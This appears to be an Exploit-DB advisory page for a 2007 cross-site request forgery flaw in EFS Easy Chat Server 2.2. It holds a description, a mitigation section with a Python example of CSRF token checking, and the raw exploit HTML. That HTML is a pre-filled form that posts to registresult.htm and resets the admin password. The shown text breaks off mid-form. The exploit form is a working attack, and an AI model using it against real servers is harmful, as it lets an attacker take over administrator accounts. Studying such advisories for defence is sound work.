Vendor: Easy Chat Server
By: Mountassif Moad
CVSS: 8.8 (HIGH)
Vulnerability Type: Cross-Site Request Forgery (XSRF)
CWE: 352
Product Name: Easy Chat Server
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: NO
Related CWE: N/A
CPE: 2.2:echatserver.com:ecssetup.exe
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2007

EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability

This exploit allows an attacker to change the admin password of EFS Easy Chat Server version 2.2 by submitting a malicious POST request to the registresult.htm page. The malicious request contains the username, password, confirm password, email and resume fields which are used to change the admin password. The attacker can then use the new credentials to gain access to the server.

Mitigation:

The application should use a secure random token to verify the authenticity of the request. The token should be stored in a secure cookie and should be checked against the server-side token before processing the request.
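
One way to implement the token check described above, as an added example that is not code from Easy Chat Server or from the original advisory. The session store, function names and the `csrf_token` form field are assumptions; the other field names are the ones the form on this page posts. Because a browser attaches cookies to cross-site requests automatically, the example compares a token submitted in the form body against the server-side copy instead of relying on the cookie alone.

```python
import hmac
import secrets

# Hypothetical in-memory session store: session id -> server-side CSRF token.
SESSIONS = {}


def start_session():
    """Create a session with a fresh CSRF token.

    Returns (session_id, token, set_cookie_value). The token is embedded in
    the form as a hidden field; only the session id travels in the cookie.
    """
    session_id = secrets.token_urlsafe(32)
    token = secrets.token_urlsafe(32)
    SESSIONS[session_id] = token
    cookie = f"sid={session_id}; Secure; HttpOnly; SameSite=Strict; Path=/"
    return session_id, token, cookie


def handle_register_post(session_id, form):
    """Validate a POST to a registresult.htm-style handler.

    Returns (http_status, message). No state changes unless the token matches.
    """
    expected = SESSIONS.get(session_id)
    if expected is None:
        return 403, "no valid session"
    supplied = form.get("csrf_token")
    if not isinstance(supplied, str):
        return 403, "CSRF token missing"
    # Constant-time comparison of the submitted token with the server copy.
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "CSRF token mismatch"
    if form.get("Password") != form.get("Password1"):
        return 400, "passwords do not match"
    # Rotate the token after a state-changing request so it cannot be replayed.
    SESSIONS[session_id] = secrets.token_urlsafe(32)
    return 200, f"profile updated for {form.get('UserName')}"


if __name__ == "__main__":
    sid, tok, _ = start_session()
    # Constructed sample body, shaped like the cross-site form on this page.
    body = {"UserName": "admin", "Password": "example", "Password1": "example",
            "Email": "admin@example.com", "Resume": ""}
    print(handle_register_post(sid, body))                         # no token
    print(handle_register_post(sid, dict(body, csrf_token=tok)))   # valid token
```

A request built by a third-party page cannot read the hidden field's value, so it reaches the handler without a matching `csrf_token` and is rejected before the password is touched.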

Exploit-DB raw data:

<HTML>
<!--
EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability
Version: 2.2
Date: Jan 11, 2007
Size:1519KB
Download Easy Chat Server  http://www.echatserver.com/ecssetup.exe
By Mountassif Moad
 -->
<HEAD>
<TITLE>EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability</TITLE>
<SCRIPT LANGUAGE="JavaScript">
</SCRIPT>
</HEAD>
<BODY bgcolor="#008000" LANGUAGE="JavaScript">
<div align=center>
<TABLE border="2" width="250">
<FORM action="http://127.0.0.1/registresult.htm" method="POST" name="regist" onsubmit="return check();">
<TR>
        <TD align="center" class="title"> <font color=red>Booom!!</font> </TD>
      </TR>
<TR>
        <TD> Username:
          <INPUT type="text" name="UserName" maxlength="30" value="admin"> *
</TD></TR>
<TR><TD>
Password:<INPUT type="password" name="Password" maxlength="30"  value="stack"> *
</TD></TR>
<TR>
        <TD> Confirm Password:
          <INPUT type="password" name="Password1" maxlength="30" value="stack"> *
</TD></TR>
<TR>
</TD></TR>
<TR><TD>
Email:<INPUT type="text" name="Email" value="admin@127.0.0.1.com" maxlength="30">
</TD></TR>
<TR><TD>
</TD></TR>
<TR><TD>
   <BR>
<TEXTAREA rows="4" cols="30" name="Resume">chi le3ba